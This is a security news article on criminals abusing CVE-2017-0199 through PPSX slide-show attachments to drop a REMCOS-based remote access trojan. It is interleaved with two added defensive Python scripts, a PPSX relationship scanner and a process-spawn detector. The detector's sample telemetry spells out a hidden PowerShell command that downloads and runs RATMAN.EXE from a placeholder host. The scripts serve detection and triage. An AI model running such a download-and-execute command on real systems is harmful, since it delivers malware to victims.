CVE-2017-0199: Crooks exploit PowerPoint Slide Show files to deliver malware

According to Trend Micro, cyber criminals abuse the CVE-2017-0199 vulnerability to deliver malware via PowerPoint Slide Show.

In April Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild.

Hackers leveraged weaponized Rich Text File (RTF) documents exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

Now the same issue is being abused in a new way to infect computers with a remote access Trojan.

According to Trend Micro, the same flaw is abused to deliver malware via PowerPoint Slide Show.

“We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild before.” reads the analysis published by Trend Micro. “As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.”

The weaponized document is delivered as an attachment to a spear-phishing message that pretends to be sent by a business partner.

The email message is supposedly an order request, but it does not include any other business documents; instead, it carries a malicious PowerPoint Show (PPSX file) that supposedly exploits CVE-2017-8570. Experts believe the attackers actually leveraged CVE-2017-0199, likely because of an error made by the toolkit developer.

Once the file is opened, PowerPoint initializes the script moniker and launches the remote malicious payload through the PowerPoint Show animations feature, exploiting the Microsoft flaw patched in April. It then downloads a file called logo.doc, which is actually an XML file containing JavaScript code.
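The delivery vehicle described above is an OOXML package: a PPSX is a zip archive whose per-slide relationship files (ppt/slides/_rels/slideN.xml.rels) declare what each slide links to, and an external relationship whose target begins with a script: moniker is what hands control to a remote file. The triage script below is an added example, not code from the article or from Trend Micro; it builds a constructed, non-functional stand-in package (empty slide parts plus one relationships file, placeholder URL) and scans every .rels part for script: monikers or external oleObject targets. The relationship type names are the standard OOXML ones; treating external oleObject targets as suspicious is an assumption made here for triage, not a rule from the page.

```python
"""Static triage of a PPSX package for external / script-moniker relationships.

Added example (not the article's or Trend Micro's code). The sample package
built by build_sample_ppsx() is constructed for this example only; it is not
a valid presentation and will not open in PowerPoint.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Relationship types whose *external* targets warrant a closer look.
# (Hyperlinks are deliberately excluded: external hyperlinks are normal.)
SUSPICIOUS_REL_TYPES = ("/relationships/oleObject",)


def build_sample_ppsx(external_target=None) -> bytes:
    """Construct a minimal PPSX-like zip with one slide. When external_target is
    given, add an external oleObject relationship pointing at it."""
    rels = [
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        f'<Relationships xmlns="{RELS_NS}">',
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/slideLayout" '
        f'Target="../slideLayouts/slideLayout1.xml"/>',
    ]
    if external_target is not None:
        rels.append(
            f'<Relationship Id="rId2" Type="{OFFICE_REL}/oleObject" '
            f'Target="{external_target}" TargetMode="External"/>'
        )
    rels.append("</Relationships>")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")          # placeholder part
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")       # placeholder part
        z.writestr("ppt/slides/_rels/slide1.xml.rels", "".join(rels))
    return buf.getvalue()


def find_suspicious_relationships(data: bytes) -> list:
    """Return (part, Id, short type, Target) for each relationship that uses a
    script: moniker or points an oleObject outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                is_external = rel.get("TargetMode", "Internal") == "External"
                uses_script_moniker = target.lower().startswith("script:")
                typed = rtype.endswith(SUSPICIOUS_REL_TYPES)
                if uses_script_moniker or (is_external and typed):
                    findings.append((name, rel.get("Id"), rtype.rsplit("/", 1)[-1], target))
    return findings


if __name__ == "__main__":
    sample = build_sample_ppsx("script:http://example.invalid/logo.doc")  # placeholder URL
    for hit in find_suspicious_relationships(sample):
        print("SUSPICIOUS:", hit)
```

Run it against a real mail-gateway quarantine by replacing the constructed package with the bytes of the attachment; a clean deck with only internal relationships returns an empty list, while any script: moniker or external oleObject target is reported with the part it lives in, which is enough to route the file for sandboxing.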

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of the legitimate REMCOS remote access tool (RAT).
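The static check on the package is one control; the chain above also leaves a behavioural trace that is independent of the file format, namely PowerPoint spawning PowerShell with a download-and-run command line. The detector below is an added example, not code from the article or Trend Micro. It runs over constructed process-creation records in an assumed, simplified pipe-separated layout (timestamp|parent image|image|command line), which is not a real Sysmon or EDR export format; the paths, host names and file names in the sample lines are constructed, and the Office-parent and script-host lists are generalised beyond the PPSX case in the text.

```python
"""Flag Office applications spawning a script host, with a higher score when
the child's command line looks like download-and-execute.

Added example (not the article's or Trend Micro's code). SAMPLE_EVENTS are
constructed records in an assumed simplified format:
    timestamp|parent image|image|command line
"""
import re

# Constructed telemetry: line 2 mirrors the chain described in the article.
SAMPLE_EVENTS = [
    r"2017-08-14T09:12:01|C:\Windows\explorer.exe"
    r"|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
    r'|"POWERPNT.EXE" /S "C:\Users\user\Downloads\order.ppsx"',
    r"2017-08-14T09:12:07|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
    r".DownloadFile('http://example.invalid/RATMAN.EXE','C:\Users\Public\RATMAN.EXE');"
    r" Start-Process 'C:\Users\Public\RATMAN.EXE'\"",
    r"2017-08-14T10:03:44|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -File C:\Scripts\report-helper.ps1",
    r"2017-08-14T10:15:02|C:\Windows\System32\cmd.exe"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -c Get-Process",
]

# Assumed lists, broader than the PowerPoint-only case in the text.
OFFICE_PARENTS = ("powerpnt.exe", "winword.exe", "excel.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|start-process",
    re.IGNORECASE,
)


def parse_event(line: str) -> dict:
    """Split one record into its four fields (command line may contain '|')."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent.strip(), "image": image.strip(), "cmdline": cmdline}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict):
    """Return a verdict string for a suspicious event, or None."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    if DOWNLOAD_MARKERS.search(event["cmdline"]):
        return "high: Office app spawned script host with download/execute command line"
    return "medium: Office app spawned script host"


def detect(lines) -> list:
    """Return (timestamp, child image, verdict) for every flagged record."""
    hits = []
    for event in map(parse_event, lines):
        verdict = evaluate(event)
        if verdict is not None:
            hits.append((event["ts"], event["image"], verdict))
    return hits


if __name__ == "__main__":
    for ts, image, verdict in detect(SAMPLE_EVENTS):
        print(ts, basename(image), verdict)
```

The parent/child pairing is the signal that survives a change of delivery vector: whether the lure is an RTF, a PPSX or the next format the toolkit authors pick, the Office process still has to hand off to a script host to fetch the RAT, and the medium-severity match on the plain Word-to-PowerShell line shows why the download markers are used for scoring rather than as a hard filter.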

With this trick, attackers gain full access to the victim’s computer.

The tool leverages an unknown .NET protector to evade detection.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” reads the analysis published by Trend Micro.

Trend Micro pointed out the importance of keeping software up to date and paying extra caution when opening documents delivered via spam email or clicking embedded links.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.


Pierluigi Paganini

(Security Affairs – Malware, PowerPoint Slide Show)


Pierluigi Paganini: Pierluigi Paganini is a member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and of the Cyber G7 Group; he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years of experience in the field and a Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to found the security blog "Security Affairs", recently named a Top National Security Resource for the US. Pierluigi is a member of "The Hacker News" team and writes for major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and many other security magazines. He is the author of the books "The Deep Dark Web" and "Digital Virtual Currency and Bitcoin".
